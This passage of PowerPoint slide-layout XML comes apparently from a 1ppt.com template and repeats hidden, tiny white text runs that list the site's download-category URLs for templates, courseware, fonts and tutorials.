              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout255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55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55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55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5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56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56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56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56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56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56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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout256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56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56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56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5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57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57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57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57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57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57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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout257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57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57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57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5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58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58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58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58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58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58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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
